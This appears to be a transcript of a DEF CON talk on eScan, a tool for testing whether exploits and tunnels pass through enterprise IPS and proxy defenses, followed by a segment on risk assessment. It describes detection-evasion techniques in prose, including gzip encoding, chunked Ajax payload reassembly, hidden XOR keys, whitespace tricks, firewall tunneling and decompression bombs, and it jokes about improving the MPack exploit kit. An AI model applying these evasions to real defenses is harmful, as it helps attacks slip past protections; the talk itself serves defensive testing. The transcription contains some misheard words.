 How you doing? I'm going to be with you in just a second. I have three versions. We have three versions of this show. And the idea to give you guys a choice for versions, kind of came from an old game called Leather Goddesses of Phobos. Anybody ever play that? Yeah, I see a lot of hands. Leather Goddesses had three modes. They had tame, they had moderate, and they had lewd. Okay? How many people want to tame presentation? Ooh! How many people want to moderate presentation? Okay, how many people want to lewd presentation? Okay! Is it too early for beer at DEF CON? It's like barely noon. No. Is it better if it has fruit, like for breakfast? Does that work better? Okay, so lewd it is. Fuck it ain't right. So quick introduction. So I'm Matt Richard. I work for iDefense, a group part of Verisign. My background is I worked in financial services for about 10 years and doing network ops and security ops, and then came to Verisign and just kind of hang out. So we have a quick talk on exploitability and extrusion scanning. So it's a quick background, something I wrote as a sort of a hobby just from hanging around and being on different networks. Fred's going to join me. Fred's going to talk a little bit more on the risk angle. Oh yeah, this is Fred Doyle. I'm the director of the iDefense Research Lab. I see some people in here that were at our party the other night. I think we had a party. I remember a party kind of. So I'm hoarse from that party still. We had a good time though, so everybody who joined us on that thanks a lot for coming. And we're not using the same PC that the presentation was written on, so we've got a couple little issues. Apple! So one of the quick things just to get out of the way, I tend to talk a little fast, so if I start rolling too fast, just throw a beer at me, I'll stop, drink it, slow down, we'll be good to go. So a quick agenda, so we're just going to go through some background on why would you need a tool like extrusion and exploitability scanning? What does it mean? Why is vulnerability assessment not enough? What does it do and doesn't it do? And by no means are we going to spend like 45 minutes on this, so don't walk out yet. I'm going to talk a little bit about extruders, and then we're going into the cool details of eScan, what it does, how it does it, and some of the different cool things it can do. And then go through a couple of real-world examples with the code and how it works and how you can use it for different tests, different things. Fred's going to talk a little bit about the risk angle to it, like now that you know all these crazy things that are allowed, what kind of hostile networks you're on, what is the risk level of that kind of stuff. And then finally I've got some real data from when the tool was run on real networks, especially through like real-world intrusion prevention and proxy systems, so we're going to look a little bit at some data to see like what kind of attacks do things actually block, you know, look at some of the exploitability data and go through that. So just a couple of quick definitions, I don't know if you can see the image there, but exploitability apparently isn't really a word, I've just been using it for a while, so nothing actually recognizes it, but in the context that I use, it's basically when we're looking at exploitability, it's something exploitable through a series of defenses. So a lot of enterprise networks have intrusion prevention, proxies, you know, 15 different layers, the defense and depth model to try to block attacks, and we just want to know through all those defenses is something actually exploitable. We don't care if it's vulnerable, we just want to know if it's exploitable. Can exploits get through? Can we obfuscate them and do things to actually get it to pass through? And then extrusion, very basic definition there, you know, what kind of traffic can we get to leave a network? Can we use, you know, a lot of people try to lock down protocols and what can be used on their network, so the eScan framework gives us a way to test, you know, different protocols and different ports to see what can we actually get out of a network. Okay, we're going to start out here with what I call the Ripley moment, and there was a time when a lot of people, not everybody, but a lot of people, most people in fact, thought that the internet was safe. In fact, I remember when I had a consulting firm in a computer store, my clients were forced to buy a $1,200 firewall, which, by the way, I set up using Linux and IP chains. They coupled to the modem in the slide? Yeah, yeah, yeah. Always had a modem, yeah. Who set up Linux with IP chains? Just a show of hands? Oh, my God, you're still alive. That's a good thing, because it was pain in the ass. Tables, a lot easier. But anyhow, so a lot of people thought that the internet was safe. Code Red, for example, came out. All my clients, because it was, of course, on the news, it's like, am I in danger? No, remember that $1,200 device you didn't want to buy, but I made you? So you're all set, right? But bottom line is this. Next slide, please. Obviously, it's not the case. Once we had one bad person on the internet, everything became bad. And that's why we're here today. All right? Now what we did, of course, we developed fields of fire. We said, okay, there's things that we can't control. We'll never control the internet. We can't control anything behind our modem. And we're mostly facing forward, okay? We are looking forward, looking at threats. And when we do pen testing, we test from the outside, looking in. But what we determined that a good way to solve all these problems is to add layer after layer after layer after layer of security. And that's where we are today. Thanks. We had planned this for remote control. All right, vulnerability assessment. These are all the things that we try to do traditionally to find out how secure we are. We do vulnerability assessment. You know, is there something that can be attacked? Penetration testing, of course we all know what that is. Risk assessment, you know, we're in Vegas. Who here has done good risk assessment in the past? Raise your hand. Okay, of those with your hands up, how many lost money at the tables? Yeah, my hand's still up. Okay, risk assessments, any software vendors in here? If there are software vendors in here, please cover your ears because I'm going to tell you right now, software vendors don't do risk assessment. They're whores. They're hookers. And I had to say that for two reasons. I had to say that for two reasons. Reason number one, I want to be able to deduct the expense from the other night. Reason number two is because the software consumer is just like a John. They want it, the vendors want to give it to us, and we don't care about the risk. We're going to get into more of that later. So one of the other things, and this is kind of where a lot of my background is from, is ad hoc testing. So in doing pen tests and everything else, a lot of stuff, good testers just sort of make it up on the fly, right? You don't necessarily have a plan. You just start looking at stuff and you just start making things up. The real problem with it is not necessarily repeatable. It's not a framework. You see an opportunity, you dive at it. It's very ad hoc. That's a lot of where the ESCAN tool came from is I used to do a lot of testing and just try stuff out, put it in the report, and eventually I realized maybe it would be nice to actually have a framework to make it a little bit more repeatable and make it work a little bit better and get some better data out of it that could be compared against each other. So the big thing missing with all these traditional security assurance is how effective is this stuff at preventing attacks against users. So we're going to go into a vulnerability assessment and why that's, why it only does half the job and is only half broken. So the key behind vulnerability assessment, right, is you have some kind of external stimulus and you measure the response and you determine, you know, through a banner, through a test whether something's vulnerable or not. What that doesn't measure is it doesn't measure what happens when things inside your network generate a stimulus and what the response is. Right? So most vulnerability assessment tool is very geared at that, what's listening, what can we talk to that gives us something back, not what might talk to us that we can give something back. So ESCAN's an attempt to dive into that arena a bit. So we talked before about defense in depth. We've got all these layers and obviously no defense in depth system is perfect, otherwise you wouldn't need the depth to begin with. So there's always those cracks, always the cracks in the system, the little ways things can get out, things can get in between. Not everything protects against everything. So we want to measure some of those, some of the cracks and try to find them and use a framework to try to get at those cracks. When I was doing enterprise security, one of the things that always cracked me up is like, CISOs have a big budget, right, and they want to spend lots of money and lots of flashy things they want to buy. So you spend like $15 billion this year and you get like 17 new gadgets and nobody actually knows what works and what doesn't work. It just gets deployed and there's a bunch of stuff out in the network and nobody really does much testing to see, does our new shiny IPS actually block anything? Does data leakage do anything at all? You know, things like that. And one of the other challenges too, one of the things that makes defense in depth so hard is that protocols are really complex, especially things like HTTP. There's so many things that can happen in HTTP. You've got layer on layer within HTTP. You've got JavaScript and Flash and, you know, it's pretty much a whole stack unto itself. One of the things I forgot to mention, if there's any questions as we go along, throw them out. By all means, you know, not everything's complete on the slide, so if you see we're missing something, throw it out. So back to the vulnerability assessment gig. So one of the issues with VA, you know, you don't check, you only check what's listening and, of course, browsers and clients like users don't listen at all. Although, so I was doing some research for the presentation. One of the things I found, there's actually a Firefox add-on that creates a web server within Firefox, and that is awesome. So we're going to go through and we're going to create a framework that sees if our protections are easily bypassed, you know, are we blocking common attacks, not bizarre things? Oh, yeah, and the other interesting thing, being in the enterprise world, is that there are actually people that don't patch because they think all the devices they spent $15 billion on actually do something. So they say, oh, no, no, we don't need to patch on Black Tuesday because our IPS already has a signature for that. So we're safe, we're going to be good to go. So one of the other problems, so when you get into big enterprises, you know, you have 100 users, patching is easy, right? That's everybody's answer. How do you solve the vulnerability issue patch? 100 users, easy, not that many applications. What about getting like 350,000 workstations? Not necessarily as easy to figure out who's patched and who's not. Stuff just falls through the cracks. I mean, even .01%, that still leaves you a bunch of machines to get owned. And at Citibank, 35 exploited machines might not be a good thing. So larger networks usually have more complex systems. Nobody tracks everything. You have ATMs running Windows. You've got camera systems running Windows, all the black box stuff from vendors. Nobody knows what runs on anything. So what I want to do is I want to add a little item to the vulnerability assessment, extrusion and exploitability assessment. And so adding all this stuff we've talked about, measure the risk. I want to try some cool things too. Like I want to look at common attacks that are out there like M-PAC. If our IPS blocks one exploit, does it actually block like what M-PAC does? And for those that don't know, M-PAC is the Russian attack tool kit that's been widely used. It was part of the Italian job a couple of months ago. But it's got eight or nine different exploits in it. It's got a whole bunch of different encoding mechanisms. And it's sold for $1,000 on the underground. So what are we missing? The text for the slide, obviously. So another thing that's missing from the vulnerability assessment game is the extrusion stuff. What can leave our network? How do we know what applications we block? Like maybe 10 years ago, Blocking Port 5190 actually stopped AIM, but that's not going to happen anymore. So users want to use applications. Security policies don't. Mainly an enterprise problem, but actually the roots of this all started back when I was a consultant. I would travel all over. And of course you've got tools on your machine that you need to do work like Skype. And so you plug into somebody's network and just to get the root surprised that they don't allow Skype on their network. So then you got to go through the hassle of trying to figure out a way to get around it, tunnel around it and do all that stuff. So I actually had started writing some tools to do that automated assessment. Just tell me how to configure my apps so that they'd work once I plugged in without having to do any manual testing. So when I was running the Big Financial Network, one of the things that I learned that's completely bizarre is that people love AIM. AIM is like the most popular application people try to tunnel around for no reason at all. And they do everything. Like tech users are doing things like running AIM over Tor just to get AIM. And actually, my favorite story is there was a president of a bank that was one of our customers and again, guy loved AIM for some reason. And one of the things he did is he actually installed a modem on his PC and was using AOL dial up to get around the firewall filters just for AIM. And the best part of it is so this is only like a year ago. He's dialed up to AIM. He's dialed up to AOL. He's using his AIM and he gets SQL slammer and takes down like the whole enterprise network for hours. Nobody can figure it out. All because he just needed AIM. Insane. So how do you determine what works on your network? I mean, the easy thing is go out and download AIM, install it and see if it works. But that's kind of a pain, especially if you want to do like 500 different applications. So another thing people like to do, extruders like to do is they like to get remote access to the machine from home beyond policy. So there's a million different ways to do it. There's reverse B and C. You can do SSH port forwarding. There's a bunch of commercial stuff. Go to my PC, log me in. Some of that stuff's easily blocked. Some's not. But how do you know what works and what doesn't work? So EE scanner is the tool that I wrote originally just for the extrusion stuff, but then adapted. And we're going to go into a lot of details later. So if you're starting to not off a little bit, don't worry. We're going to the cool stuff soon. So we want to do a couple things. We want to measure all that stuff. We want to go into, you know, what are we blocking? What are we not blocking? Got a yada. Where are the weeds grow through? Did we spend money that falls in line with the threats we were trying to protect against? So all enterprise networks, especially lots of layers. We've got things like transparent HTTP proxies, transparent SMTP, transparent DNS, intrusion prevention, all data leakage stuff. So we want to just test through all that stuff and find out what works. Oh, so actually, I'm going to skip most of the slide, but one of the ones that, so one of the exploitability examples I really like was the original VMLO day that came out. And when it did, the proof of concept used the RECT method. And so every IPS vendor out there and every security vendor, they all wrote their SIGs for this RECT vector, right? And it turns out there were like nine different shapes that you could use to get the same exact effect. So the signatures were absolutely useless in protecting all but that proof of concept. So there's a couple of tools that I always used to use, obviously great tools that worked very well. My big crutch with all of them is that none of them had great automated ways for doing it. Like Metasploit, really good for running and seeing if your defenses are blocking certain types of exploits. Works really well. They've got a couple of encoding techniques in it. So you can get a lot of good information using Metasploit for that. There's another tool called F-Tester, which does a lot of the same things. It'll do outbound firewall scans. You can take snort signatures and have them pump them out to see what gets picked up. It's good but it doesn't do everything that I was looking for. It doesn't really behave like a client. Like it was taking just IDS signatures and just pumping them out rather than a full HTTP context and really getting all the data in there. Because sometimes when you mess around with little variables you find out like a vendor might do something one way with this set of data and another way with another set of data. So just pumping SIGs doesn't really do everything you want. Core impact, really, really cool and you could probably do all this but it costs a lot, a lot of money. So not necessarily very well for what I was looking for. So my whole goal with this is to write EE scanner. Get it out there. It's going to be free. Most of the stuff is already out there at EEscan.net and it's going to be up on the iDefense site more than likely to. Some of the code I didn't get to publish before I left and I couldn't get a connection from my hotel. So some of it won't come out until I get home Monday. But all the stuff is we're going to go through and show different ways to use it. So we're going to test for all those things. We're going to do a little bit of, we're going to get some good reports at the end that show us what gets blocked, what doesn't. So here's a quick overview of the architecture. So EE scan is mainly written in Python. There's a couple of other components like in PHP as well. But one of the things I liked about Python is one that keeps me from writing really bad Perl code. And the other thing it does too is it gives you a shell that's nice that you can just call functions right from a shell. So if you want to do manual testing, you can do it that way or you can script it all. So the real point of EE scan, you have the base classes which implement a whole bunch of things like AIM protocols and port scanning and HTTP encoders and all the stuff that we're going to need to do our testing later on. All in one base class. So we can import those base classes. And there's another section that does unit tests. So we can write a whole bunch of like simple tests as unit tests and then have it run through all our unit tests later on. HTTP exploit checks. So there's a module that just does like encoding. We'll go through those methods. And AIM tests, of course, you know, everyone needs AIM so we need lots of good test frame. And then on the server side, so that's all client side stuff. On the server side, there's a PHP exploiter that takes information and kicks it back out to the client. So it'll actually send the exploits with whatever encoding we want. With TCP responder, so when we're testing for things like transparent proxies, we can't always rely on just interacting with the proxy. Sometimes we need something on outside of that that we can test through and try to make real connections to to see what gets modified. And then finally SSH and tunnels and all the things. You know, I didn't rewrite DNS tunnel or ICMP tunnel or any of that stuff. So all that stuff sits on external server as well. And the real key is we want to run our client side stuff in our network and we want all the server side stuff outside the defenses. So we're testing through everything rather than just at something. So diving in the base classes. So a couple of things, egress scan is probably, you know, one of the simplest modules does an outbound port scan. All my examples here are from a Python interpreter. So you drop down to Python, import the base classes and you can run everything just like this. So egress scanning, we pump in IP and we tell it, we want to scan from port 1 to 1024 and it kicks back the results, kicks back the results to us. So I included Parameco for SSH. So there's a whole wrapper around Parameco for doing SSH and port forwarding. Real simple to use. You instantiate a class. It goes out as an egress scan, tells us all the ports that are available. And then we tell it we want to know what protocols are actually. We want to check for which protocols will actually let us pass SSH over them and it kicks back all the different ways that we can use SSH. So another module is the unit test harness. So you can write, I know it's kind of hard to see up there, but basically with about seven lines you can write test descriptions and tell it, like one of them up there is AIM tour. So you can tell it that I want to use the tour module. I want to make a TCP connection over tour. I want to make it to login.oscar.aol.com and I want to do it on port 5190. So you create all these little tests written like that. You kick it into the unit tester and it'll tell you all the results coming back. I have maybe like 50 or 60 unit tests, but it's really extensible. You can do pretty much anything you want with it. Anything with TCP, SSH, ICMP tunnel, DNS tunnel, whole list of different protocols and tunneling mechanisms. There's a whole separate tour support section. It's actually a SOX module, but you can basically use any SOX server because tour just acts like a SOX 4 and 5 proxy. So you can instantiate a tour class and then use it just like you would a socket and Python. So you can do send and receive. It does all that legwork for you. And it's actually used by other modules as well if you're doing a tour testing. So one of the interesting things you can do with like egress scanning is you can see what's proxied and what isn't. So like for people who saw Dan's talk, his big thing was hostile networks. How do you know when you're on a hostile network and things are being proxied? Sometimes it's really easy to tell. You just do like egress scan to a dark IP that doesn't exist at all. In this case in the hotel that I was staying at, I got three results back, 25, 53, 80. So really easy hint that you're actually in a captive portal and that they're transparently proxying all those protocols. Another thing you can do, like you always, a lot of providers block arbitrary things. They block sometimes IRC or all sorts of random things. So my Colo, I wanted to know what protocols they block. Really easy to fire off right from the command prompt. There's actually an extra flag. Block equals one, which tells it just only show me ports that are blocked, not ones that are open. And then finally, another module called check plane, which tests to see if it's a plain TCP socket as compared to proxied socket. So you can do things like on port 80, try to make a direct connection and find out if there's a transparent proxy in the way. In this case, the output's a little cryptic, but it's 001, so I tested 25, 80, and 123, 001. So not a plain connection, not a plain connection, not a plain connection, plain. Real simple. All this is actually a lot easier when you do it in scripting, but all easy to do from the interpreter as well. So the other phase we talk about exploitability testing, we want to know what kind of exploits we can pass and how we can encode them. So HTTP, really complex protocol, lots of different ways to do stuff. It's got like a whole protocol stack into itself. You've got JavaScript. It supports native methods at the protocol layer like Gzip, deflate, chunk, SSL. So we can try all those different ways of encoding things. We can use lots of different JavaScript methods, some that are used in the wild and some that I just made up. So we'll go through those things like Ajax, XOR, white space, random variables, random functions, a lot of stuff like from the VOMM, stuff like that. So one of the things, obviously IPS and IDS isn't really a great technology and one of the main reasons behind it that you take a look, here's a signature for detecting A&I exploits and the big problem right here, as long as it's going to an HTTP port, it'll detect it. So running things like HTTP over 443, trivial bypass to a signature like this. It's got hard-coded bytes in there so any white space or other randomization or encoding completely bypasses it. So some of the tricks, so there's a module with an EE scan, HTTP encoders. So the HTTP encoders allow you to take an arbitrary payload, do the encoding, and then kick it back to the client for testing. So some of the ones, GZIP, Deflate. Interesting thing with that. So GZIP and Deflate, does anybody know what GZIP and Deflate do with browsers? Real simple, right? Just GZIP the content. Deflate is GZIP without a GZIP header. Real simple. You'd be surprised how many devices will detect GZIP stuff but not Deflate. What the fuck? So anyway, so my favorite, Ajax. So that was when I kind of wrote myself. So Ajax is kind of like a frag route for HTTP. So what you do, instead of just sending the entire exploit in one or two packets over a regular HTTP session, you use XML HTTP request and you break it up into chunks. So JavaScript is really nice. You can treat code like data and data like code. So you tell it, go out and get this exploit and break it up into any arbitrary number of chunks. Send it back to me. I'll concatenate them all together and eval it. So real simple technique but IDS is other things like that rely on actually seeing the code together. Even if it's obfuscated in the code, a lot of times they can pick it up. But if you break it up and do a frag route type attack, it works much, much better. So another one of my more favorite Ajax is some of the encoders out there and I'll actually go through MPAC in a minute. They do things like the XOR and the Lexor with the static key. So if you're looking at that TCP dump or anything or any tool, you can actually see what key they're using to decode the data. Right? Simple loop. So what I like to do is I like to actually send the key in a separate XML HTTP request, break it up. That way an analyst looking at it has no idea what the key is unless he's got all the network traffic instead of just a couple of packets. So here's MPAC. It came out a little blurry but MPAC basically does like a nice little XOR loop. On the top you've got a plain text string and this is all in the Python interpreter again. You've got document.write hello world. Run it through the MPAC XOR engine. It spits it out as an XOR function with all the data XORed into a blob which is going to go through an XOR. The browser will then interpret. And then the bottom example is just using the same MPAC XOR except this time using random function and variable names. Just another way to kind of get around some of the static detection that's out there. So here's an example of the Ajax encoding. Here's the source where I mean it's not complex at all. Literally all you do is you just tell the server I want to break this up into some random number of chunks, 20, 50, whatever it is and give me each piece one by one, reassemble them and eval. One of the interesting things is this is actually, this technique is really easy for humans to evaluate but really hard for machines. Because humans can just go through, look at the code and see that oh yeah I just need a W, get all the different slices, assemble them back together and I've got the code. Machines really, really don't like that. So the MPAC attack toolkit, really famous, everything else, they sell for like a thousand dollars in the underground, exorbitant prices for something with a lot of flaws. So what I did when I was going through this is I looked and said MPAC is just terrible with encoding. So what I'll do is I'll improve it for them and sell it back for like 10 grand, who knows. So one of the stats on MPAC, it only infects 3.3% of machines in the U.S. which is a terrible rate. It does a lot more in developing countries where every version of Windows is pirated and not patched. But in the U.S., 3.3%. And one of the reasons is that AV vendors actually pick up the MPAC JavaScript. So they do a terrible job at obfuscating other than the one basic technique. So you've got the pseudo code for what they do, just a simple XOR of all the data. So some of my ideas for them that I'm going to kick back to in my business proposal are random function names, white space comments, XMLHDP requests for the XOR key, GZIP encoding. And for God's sakes, these guys have no idea if they ever heard of Millworm. They use like the newest exploit they have is like A&I from a couple of months ago. They had no exploits at all. It's awful. So go through a couple of real world examples, places where I use it. So reality check number one, checking loving aim. If you want to actually do the unit test for aim, type's a little bit small. But basically you just write a couple of simple tests for each one. Can I connect using default settings? Real easy to write up the test. Can I do crawl settings? Have it do a port scan of all of login.oscaret.aol.com. Kick back all the ways you can get there. Tor, same thing. So all this stuff is real easy to implement and automate for a testing scenario. And if it's a protocol that's not supported, just write a quick Python module for it and off you go. So some of the other cool things. So I really like tunneling stuff. So this will actually go through and do like there's a DNS tunnel module, ICMP tunnel module, SSH port forwarding built in. So here's some more examples right from the command line if you want to do HTTP exploit checking. It's as simple as doing a calling one function. So you call get HTTP MD5. And what's happening behind the scene. So you've got the two parts. You've got the Python script and then you've also got the server side PHP. Python script makes a request for the exploit. The server side takes all the content, adds an MD5 header, a HTTP X header for the MD5. Client gets it back, compares the MD5, and now you know if it's been modified in transit. So real simple. So in this case we do HTTP MD5 for, we're passing parameters to a test.php. We tell it the code we want is plain and the exploit is linked in. And it kicks back and tells us in the results that the connection was broken. So in that case, what a lot of IPSs do is when they fire on alert instead of modifying the content, they just kill the connection. So broken TCP connections are a great indication that something's actually just been dropped. Next example, GZIP. So we run the same thing. Again, this time we see MD5 mismatch. So the results that we were expecting were different than what the MD5 say. Usually that stuff, like proxies, like to modify the content instead of just dropping it. So instead of sending the exploit, they send you a page back that says, like, we blocked this page for you, you're safe now. So same thing with the impact one, we see that one gets dropped. And you can go on and on with all the different encoding techniques forever. So one of the things real easy, just drop in. I have a quick function called try them all, goes through every possible permutation, kicks back the results to you in HTML, and now you can look and see what's being blocked, what isn't. And at the end of the talk, I've got some real-world data, and you can see some interesting patterns and different devices and how they look at exploits. So we'll look at that later on. We try all the different exploit techniques, all the different encoding techniques, and just for good measure, we try a couple different user agents too, just in case maybe there's a difference in user agents. So my favorite one, this one I used to do in operations, is testing incident response plans and MSSPs. So men's security providers, you know, you pay a lot of money and you never really know what they do for you. It's kind of like a black box. You call up, you call them up, they say, oh yeah, you're covered, but they don't share anything with you. And you never really know if they're alerting you on everything. So one of the things that's easy to script out with this is to do an MSS test. So fire off an exploit, fire off an additional request to get a payload, then have it fire out a bunch of like posts with like key logger data, and then sit back and watch and see what happens. And then of course, the most important set up a cron job to run every Sunday morning at 430 just to make sure everyone's on their toes. So this is a great slide. So I was doing some research and I like to add an image every now and then I was looking for something that followed up with risky business, just a random image. And I came across the it's like state of Nevada risk management center. And they have this picture that I put the you can't read the text, but I put it right next to it. Risk management is the expert management of differences that may exist between expectations and reality. And what in the hell is that picture blows my mind? What the fuck is that? It's crazy. So Fred's going to tell us exactly how all that works. But the way he scan fits into the risk assessment process, you get a lot of get all this data back. But what does it actually mean to you? What's the if you're one of the corporate guys that actually needs to do risk assessments? How do you use it for something useful? I read Matt showed me that the other night. And I thought it was just because my blood alcohol was like a point three. But today when I'm only a point two, still doesn't make any sense. Risk management, the expert management of differences that sounds like my first marriage. Anyhow, the bad thing is, here's our conventional risk assessment. And that misses the mark two. Who can tell me what any of that means? Well, obviously, it's arithmetic. And please don't say mathematics, it's arithmetic. You know, we have some multiplication, we have some addition in there. But the bottom line is this, all right, when you are making estimates on everything that you're doing, how can you really put a good value on what the risk is? Everything single loss expectancy, the annualized rate of occurrence, everything else like that, that's a guess. And if it's not a guess, and if you have the statistics for it, what says that 2008 is going to be same as 2007? How many people here have actually scanned for extrusions and exploitability? Please raise your hand. Okay, a fair number. Okay. Why hasn't everybody else? Well, the reason is because right now it looks like the risk is zero. It doesn't look like there's a risk from it. Just because we don't notice a rate of error and a rate of occurrence or an occurrence doesn't mean that it's not there. So the holistic threat assessment, that damn picture again, what the hell is it? Okay, the holistic threat assessment, we have to worry about what the asset value is. And instead of going through each one of these things, what I'm going to do is I'm just going to give you an example. Okay, I've got a house in Florida. Not really, but I wish. I have a house in Florida. The house in Florida is susceptible to weather damage. All right. So I've got the asset, I've got the vulnerability, the exacerbation is there's a hurricane off the coast. The mitigation is my house is made of steel. And the perturbation is this one of those 500 year storms that takes everything out in the path. All right. Now I defy anybody in this room to use a standard CISSP model to give me a risk based on those things. Wait a minute, just to check. How many people have the I am not a CISSP badge? Nice. So basically what we're doing is we're trying to quantify something that we're just starting off with with guesswork. Right now, there's a different risk model that we are kind of looking at the risk model still in the design stage. It is not arithmetic, it's real math. It's a real model. One of the elements is the holistic design that you saw before, the things that you saw before. But the bottom line is it appears to work very well with CVSS data. If none of you know, I defense aggregates every vulnerability that is on our covered vendors list. And we keep that data. And right now we're doing the CVS scoring on it, CVSS scoring. And we've even started to use a CVSS version two scoring on it. And still we haven't gotten 100%. The first model was maybe 60 to 70%. Now it's 80 to 90%. Perhaps maybe 80, 85%. But the thing that is on those 15% that's left over, you still need a person. So why worry with the model? The model that we're working on actually is pretty much dead on for everything. So it looks good. Okay. So so in the real world usage, so this has been run, I've had some people run it for me, I've been using stuff for a while. So as with anything, you get some interesting results back. So I'm going to go through a couple of those. So the first one, for some reason, AOL servers don't respond to any TCP packets without an MSS and not just max segment size. And there's other things they don't do too. So one of the ideas that I have is I think you can actually probably fingerprint IPS devices just on the results you get back, and weird things like not replying without MSS. Because obviously it's not it could be the servers that drop it, but it could be something else in between. So there's maybe some opportunity to do some fingerprinting of devices passively, just by watching what they drop and don't respond to. So the next one, just because they don't ask doesn't mean they don't want it. One of the interesting things I found is that so browsers, when they want, when they want to use an encoding mechanism that supported like GZIP or deflate or chunked, they asked for it, right? They put an accept header that says, you know, accept GZIP, accept deflate. But you know, sometimes proxies strip that out. Sometimes they don't send it because they don't support it, things like that. What are the interesting things with things like Firefox, IE, and a couple other browsers is that even if that tag gets stripped out or even if they don't ask for it, you can send it to them, they still just render it, right? So it actually, the accept, actually having that in the header means nothing. You just send it back to them, they'll just render the GZIP data just fine. So another interesting thing, simple tactics, this is probably obvious, but are incredibly effective against almost every kind of device, every kind of IPS and a proxy device. Just things like random white space, 50% effective in the real world testing. Like just adding spaces in kills that many protections. Remember the old mail bomb with a mail server, so if you want to crash a mail server that had like antivirus, you do like DD dev zero, like a terabyte, and then you GZIP it down to like 20K and you mail it through and it tries to, you know, open it up and it just dies bombs. Yeah, that kind of works with proxies too. They don't really like GZIP data like that, like a petabyte of zeros doesn't decompress that fast. So interesting. I don't have anyone read the interview with the MPAC authors, dream coders team, so they did an interview as on security focus with Rob Lemos. So at the very end, they talk about, they ask them, you know, if people want to be safe from your attacks, what should they use? And he says opera, whatever. It's actually IE4 on NT4. So one of the interesting things is that most of the exploits and most the encoding mechanisms, it won't even render. So things like GZIP, it just dies on like half that stuff doesn't even work right on it. So it's actually incredibly effective against blocking out all kinds of encoding because it just doesn't even, doesn't do anything with it. And then as we'll see in the next couple of slides, as long as you can block out all that encoding, some devices actually do a decent job at blocking attacks. So NT4 behind an IPS might actually be safe. So here's some quick output from exploitability scanning, just doing some HTTP checking. So the output basically comes out, it tells you, here's the test that you ran. Here's what Portray ran it on because one of the other things it does, it tries HTTP and HTTPS. Obviously most things don't catch HTTPS unless they're doing an SSL man in the middle like blue coat, some other devices. So it runs through all the tests, goes through all the possible permutations and it tells you what happened. So in the results we can see here, there were three attacks, three exploits that were actually blocked, indicated by the broken, and the rest all passed right through. So simple things like adding white space was able to evade in some cases or the M-pack encoding. So here's just four quick examples of four things. So this is just graphs of that same data I just showed you, run on different device types. It was interesting when you look at it from a distance like this, you can almost see patterns, like different devices have different ways, their engines have different ways of looking at the exploits and encoding and doing something with it. So let's drill down into a couple of those. So here's one, it's a men's service provider and they have a custom IPS device that's supposed to do stuff. And what we see is that they block plain exploits and they even handle a couple of encoding like white space and chunked, but they do nothing with JavaScript and they do nothing with GZIP. So if you GZIP it, everything goes through. If it's plain, they catch 80%. So next one, we have a proxy device running antivirus. What we see is it's really bad at catching the exploit itself, but they're really good at catching the encoding mechanism. So something like M-pack, they actually pick up every single time, regardless of what the contents is. They just figure, you know, if it's M-pack encoded, we just kill it. And then they're only like 50% effective when you actually do something with the M-pack encoding and like say, add white space to it. So you can see the effectiveness really drops off pretty quickly. So the Astara guys, so they do a good job. And one of the interesting things from theirs is they actually don't manage to stop anything except GZIP stuff. It was the only, it was the only device I tested that if you didn't send an accept GZIP header, they actually thought that that might be a problem when you sent back GZIP data. So interesting thing, but they didn't actually stop any of the other exploits, all on a fully updated system. And then, so my last test, so I'm running this through on a couple different device types and got my switch, I got my device out connected to the internet and I start, I run it. I'm like, holy crap, this is like the best device I've tested. It gets everything. This is awesome. And then, so I'm just, I'm starting to pump information in, then I look and I'm like, and it's wireless. This is really awesome. So yeah, actually unplugging the cable is incredibly effective. And we have a little bit of time here. We weren't really sure if we were going to make this on target, so I did not tell you my favorite risk assessment story. About 10 years ago when I was 15, okay about 35 years ago when I was 15, 50, okay 36 years ago to be exact when I was 15. I worked for my father in his body shop and he went out to lunch and back in those days he usually had a liquid lunch. In fact to this day he still has liquid lunch but that's cool. But he comes back into the shop and I have a car jacked up and I'm working underneath the car and I don't have any jack stands, okay. Now I just have a floor jack, nice solid hydraulic floor jack and I'm under the car working on the car. He grabs my foot, pulls me out from under the car, pounds the shit out of me, takes a bite out of my ass, explains to me that no the chances out the car is not going to fall, but if it does fall you might get hurt, alright. Here's a guy that didn't have a high school diploma, here's a guy that just had common sense, but he had more common sense than a lot of CISOs that I see, okay. Yeah you can clap, go ahead. Shortly after that I went a different way, I actually became a cop, but the third year on the job I got a call where a guy was under a car in a body shop and the car had fallen on him he wasn't using jack stands. So we are not really good at risk, we're not really good at figuring out what risk is. To me it wasn't risky at all being under there, I mean the chances are one in a million is going to fall on me, but if it fell on me it would have killed me as it killed this other guy. So you know you guys that have to answer to all these policies and all the modeling that you see out there, all the competition for your money, just step back and say does this make sense to me? And I think you'll go a lot further, okay. And so one last comment I wanted to add in is that one of my goals with E-Scan and the exploitability testing is to be able to go out and actually profile a wide range of devices, because I think what we're going to find is that seeing what they can block today tells us a lot about what they might be able to block in the future. So it actually is a little bit more predictive and more useful in that means than it is in just knowing what can actually be sent through. So open up to questions, we have the question room later as well, so anything...